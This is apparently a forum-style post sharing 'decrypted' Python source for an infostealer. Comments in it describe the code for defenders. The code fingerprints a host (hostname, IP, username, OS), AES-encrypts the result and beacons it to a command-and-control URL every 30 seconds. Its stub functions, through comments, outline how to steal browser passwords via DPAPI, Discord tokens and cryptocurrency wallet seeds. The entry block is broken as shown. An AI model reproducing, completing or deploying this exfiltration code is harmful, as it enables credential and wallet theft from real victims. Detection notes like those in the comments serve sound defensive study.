HERE IS THE DECRYPTED CODE YALL
import sys, re, socket, os, platform, subprocess, time, json, uuid
from urllib.request import Request, urlopen
from multiprocessing import Process, freeze_support
from base64 import b64encode
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from Crypto.Util.Padding import pad, unpad
from win32crypt import CryptUnprotectData
# Configuration and Constants
# Static configuration used by send_beacon() and main_loop().
# For defenders: all three values are hard-coded in the sample, so they can be
# recovered from the binary/script and used directly as indicators and for
# decrypting captured beacon traffic (see aes_encrypt).
CONFIG = {
    'C2_URL': 'https://s3.amazonaws.com/testbucket1/api', # Example C2 URL - the original was a placeholder not a real one
    # Key material is passed through SHA-256 in aes_encrypt(), so the literal
    # length does not matter; a static key here means no forward secrecy.
    'AES_KEY': '1234567890123456', # Example AES Key
    # Seconds between heartbeat POSTs (time.sleep in main_loop) - a fixed
    # interval with no jitter is a usable network-detection feature.
    'BEACON_INTERVAL': 30
}
# --- Utility Functions ---
def aes_encrypt(data: str, key: str) -> bytes:
    """Encrypt *data* with AES-CBC under SHA-256(key) and return base64(iv || ciphertext).

    Analyst notes:
    - The key is derived by hashing the configured string once (no salt, no KDF),
      so anyone holding CONFIG['AES_KEY'] can decrypt every beacon.
    - CBC without a MAC: ciphertexts are unauthenticated, which matters for
      anyone attempting to emulate the C2 side safely in a lab.
    - The IV is the one PyCryptodome generates when none is supplied; it is
      prepended in clear, so the first 16 bytes of the decoded body are the IV.
    """
    # 32-byte key from SHA-256 of the UTF-8 encoded key string (AES-256).
    key_hash = SHA256.new(key.encode()).digest()
    # No iv argument: a fresh random IV is created per call.
    cipher = AES.new(key_hash, AES.MODE_CBC)
    # PKCS#7 padding to the 16-byte block size before encryption.
    ciphertext = cipher.encrypt(pad(data.encode(), AES.block_size))
    # Wire format: base64(IV || ciphertext), returned as bytes.
    return b64encode(cipher.iv + ciphertext)
def collect_system_info() -> str:
    """Return a JSON string describing the host (initial victim fingerprint).

    Every field comes from the standard library; nothing is read from disk.
    Host-based detection notes: socket.gethostbyname(socket.gethostname())
    triggers a local name resolution, and os.getlogin() needs a controlling
    terminal (raises OSError when run as a service or from some schedulers).
    Neither call is wrapped, so the sample crashes on those hosts before the
    first beacon - the outer try in the entry block then swallows it.
    """
    info = {
        'os': platform.platform(),
        'arch': platform.machine(),
        'processor': platform.processor(),
        'hostname': socket.gethostname(),
        # Resolves the host's own name; may raise socket.gaierror.
        'ip_address': socket.gethostbyname(socket.gethostname()),
        # May raise OSError without a controlling terminal.
        'username': os.getlogin(),
        # Random per run, not persisted: the "victim id" changes on every launch.
        'uuid': str(uuid.uuid4())
    }
    return json.dumps(info)
# --- Exfiltration Functions (Stealers) ---
def steal_browser_data(browser_path: str, profile: str) -> str:
    """Stub: returns a status string only; no browser files are touched.

    In this sample the function performs no I/O - the only observable effect
    is the string embedded in the next beacon. Defensive relevance is the
    imported win32crypt.CryptUnprotectData (unused here), which is the usual
    indicator that a fuller variant targets DPAPI-protected browser secrets.
    """
    # This is a complex function usually involving:
    # 1. Finding Local State and Login Data files.
    # 2. Reading the master encryption key from Local State (JSON).
    # 3. Decrypting the master key using CryptUnprotectData (Windows API).
    # 4. Connecting to the Login Data SQLite database.
    # 5. Iterating through 'logins' table and decrypting passwords with the master key.
    # NOTE: Implementation for security reasons is omitted, but this is the intent.
    return f"Attempting to steal data from {browser_path} profile {profile}"
def steal_discord_tokens() -> str:
    """Stub: returns a fixed status string; no filesystem access in this sample."""
    # Looks for 'Local Storage\leveldb' directories for Discord/Discord Canary/etc.
    # Reads/decrypts token data from the .log and .ldb files.
    # NOTE: Implementation for security reasons is omitted, but this is the intent.
    return "Attempting to steal Discord tokens"
def steal_wallet_keys() -> str:
    """Stub: returns a fixed status string; no wallet files are read in this sample."""
    # Searches for common cryptocurrency wallet files (e.g., Electrum, Metamask, Exodus)
    # and attempts to copy/extract seed phrases or key files.
    # NOTE: Implementation for security reasons is omitted, but this is the intent.
    return "Attempting to steal crypto wallet data"
# --- C2 Communication ---
def send_beacon(data: str) -> None:
    """POST aes_encrypt(data) to CONFIG['C2_URL'] and discard the response.

    Network-detection notes (all visible in this function):
    - Exact User-Agent 'Mozilla/5.0' with no product tail.
    - Content-Type 'application/json' while the body is raw base64 text,
      not JSON - a cheap mismatch to alert on.
    - Fixed 10 s socket timeout; any exception (including HTTP errors and
      NameError from the broken entry block) is silently dropped, so the
      sample never retries or backs off within a call.
    The response body is never read, so no tasking is received here.
    """
    try:
        encrypted_data = aes_encrypt(data, CONFIG['AES_KEY'])
        headers = {'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0'}
        # Body is the base64 bytes from aes_encrypt, sent verbatim.
        req = Request(CONFIG['C2_URL'], data=encrypted_data, headers=headers, method='POST')
        urlopen(req, timeout=10)
    except Exception as e:
        pass # Ignore errors, wait for next interval
def main_loop() -> None:
    """Run the sample's lifecycle: fingerprint, stub "stealers", then heartbeat forever.

    Traffic pattern produced (useful for writing detections):
    1. one POST containing the host fingerprint,
    2. one POST containing the three stub status strings as JSON,
    3. then one POST every CONFIG['BEACON_INTERVAL'] seconds with a timestamp.
    The loop never exits on its own and never reads a C2 response, so the
    "check for commands" step below is not implemented in this sample.
    """
    # 1. Initial System Info Collection
    system_info = collect_system_info()
    send_beacon(f"Initial Info: {system_info}")
    # 2. Data Stealing (Stubs for the actual malicious logic)
    # The actual code would iterate through common paths for browsers, discord, and wallets
    # and call the respective steal functions.
    stolen_data = {
        'browsers': steal_browser_data("Chrome", "Default"),
        'discord': steal_discord_tokens(),
        'wallets': steal_wallet_keys()
    }
    send_beacon(f"Stolen Data: {json.dumps(stolen_data)}")
    # 3. Continuous Beaconing (C2 communication)
    while True:
        # Check for commands from C2 and execute them
        # (This section is also a stub for the full logic)
        # Heartbeat payload is just the current epoch time; constant cadence.
        send_beacon(f"Heartbeat - {time.time()}")
        time.sleep(CONFIG['BEACON_INTERVAL'])
# Entry block as rendered on the page. The underscores of __name__ / '__main__'
# have been stripped by the forge's markdown rendering; as written, `name` is an
# undefined global and this line raises NameError before anything runs.
# (Kept byte-identical here - it is an extraction artifact, not sample logic.)
if name == 'main':
    # Use multiprocessing freeze_support for better compatibility on Windows executables
    freeze_support()
    # The actual execution would typically fork or use subprocess to evade simple termination
    # Note: subprocess and Process are imported but never used in this sample.
    try:
        main_loop()
    except Exception as e:
        # A typical pattern is to fail silently and delete itself or try again
        # Any crash (e.g. os.getlogin() OSError in collect_system_info) ends the
        # process quietly - no persistence or self-deletion is implemented here.
        pass